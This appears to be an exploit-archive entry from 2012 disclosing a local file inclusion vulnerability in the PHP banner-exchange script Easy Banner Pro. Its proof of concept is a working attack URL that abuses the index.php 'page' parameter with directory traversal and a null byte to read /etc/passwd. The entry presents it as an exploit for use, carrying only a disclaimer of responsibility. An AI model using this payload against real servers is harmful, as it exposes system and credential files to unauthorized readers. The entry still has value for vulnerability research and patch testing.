id: 19253
date: 08/24/2012
title: Easy Banner Pro (index.php page) Local File Inclusion
author: Yakir Wizman
cves: 

-----------------------------------------------------------
Easy Banner Pro (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/
Demo - http://www.scripts-demo.com/easybannerpro/
ISRAEL
-----------------------------------------------------------
       Author will be not responsible for any damage.
-----------------------------------------------------------
 
About the Application
-----------------------------------------------------------
Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system.
 
 
Proof Of Conecpt
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL  : http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #